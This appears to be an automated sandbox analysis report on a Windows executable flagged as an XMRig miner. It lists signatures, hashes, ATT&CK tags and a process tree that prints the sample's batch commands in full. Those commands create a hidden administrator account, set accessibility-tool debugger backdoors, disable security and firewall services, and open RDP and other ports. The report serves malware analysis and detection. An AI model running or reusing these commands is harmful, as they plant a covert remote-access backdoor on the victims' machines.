Analysis
-
max time kernel
42s -
max time network
6s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
11-08-2020 12:30
General
-
Target
foo/bc6536b86b04cf5b3bf7cd353d615ab9.exe
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Modifies WinLogon 2 TTPs 13 IoCs
-
Drops file in System32 directory 6 IoCs
-
Drops file in Windows directory 7 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\U.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\net.exenet user ontar /DELETE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar /DELETE4⤵
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Администраторы ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Администраторы ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrateurs ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrateurs ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilisateurs du Bureau а distance" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilisateurs du Bureau а distance" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop-gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop-gebruikers" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop gebruikers" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "??????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "??????????????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????????????" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorzy ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorzy ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorer ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Brukere av eksternt skrivebord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Brukere av eksternt skrivebord" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios Remote Desktop" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios Remote Desktop" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup gli amministratori ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup gli amministratori ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administratorer ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Anvandare av fjarrskrivbord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Anvandare av fjarrskrivbord" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "RemoteDesktopBenutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "RemoteDesktopBenutzer" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Benutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Benutzer" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup yoneticileri ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup yoneticileri ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzak masaustu kullan?c?lar?" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzak masaustu kullan?c?lar?" ontar /add4⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no4⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpassistant /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTEМ /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Аdministrator /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Aдминистратор /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPLifeInterval /t REG_DWORD /d "00005180" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "FFFFFF9D" /f3⤵
-
C:\Windows\SysWOW64\sc.exesc config rasman start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config remoteaccess start= auto3⤵
-
C:\Windows\SysWOW64\net.exenet start rasman3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rasman4⤵
-
C:\Windows\SysWOW64\net.exenet start remoteaccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start remoteaccess4⤵
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wscsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SharedAccess3⤵
-
C:\Windows\SysWOW64\sc.exesc create tlntsvr binPath= tlntsvr.exe3⤵
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start= auto3⤵
-
C:\Windows\SysWOW64\net.exenet start tlntsvr3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start tlntsvr4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 system3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 4899 system3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Documents and settings\ontar" /S /D3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d 0x0 /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg.rkr" /t REG_BINARY /d "1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000" /f3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\ontar +r +a +s +h3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exereg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList» /v ontar /t REG_DWORD /d «00000000" /f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\SH.bat" "2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\system32\dllcache3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\System32\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\SysWOW64\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe"C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe" -silent2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Account Manipulation
1New Service
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Hidden Files and Directories
2Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\foo\SH.batMD5
21ef54fce2b94d13c5c8bc294fbc5e11
SHA157a38e4649b34e4bb36b778c17de0804ac418132
SHA256896fe05ecf0c6826cb5265a43118fc242ecc7a5457e487a0976a73c514a4a16d
SHA5122f539290cb27bd88cdf73e976a9a77de951cdc2f428669bc472470cf9775f7c3e4c351e5eabdafeef074954fdd8efe61096a09dc1f1a2ee4ba72426e263378c7
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exeMD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
SHA2568c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8
SHA5120bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f
-
C:\Users\Admin\AppData\Local\Temp\foo\U.batMD5
1fae59414d8f21e40d105f47f6b23edd
SHA1c157832a5322d53130fa1e568abf7b66e2ae87cc
SHA256d58f99d63f3306ccc68130af6cd7e539198e26b0ce2cb647b3ac710b974cec7e
SHA512c579e56e3f449bcfc50c9d32f85bb55a0e2fd34d54146654188c38f7c2af529a04c9471afab10bf1c529cae9ef0c185a8712cf626c8c84a306dc3758dc29b538
-
C:\Users\Admin\AppData\Local\Temp\foo\prop.exeMD5
48522d32f014350cb5b8d55ca8b52678
SHA14b84fedea40c4db502427cbc9e0ceffb18bf7033
SHA2567b0fd59157936cbaa2fe204fba06b22f11bfc5373aa7ea918a5c0e42035094bd
SHA51205bddf16831b456a66936af181bac73e23131e2d0698db0d1a93b51c60fdaedff1a389e6adf3cb619921211147ce54ca6c5be25dab4c79169e914dcc0b2a50ae
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\foo\TSPatch.exeMD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
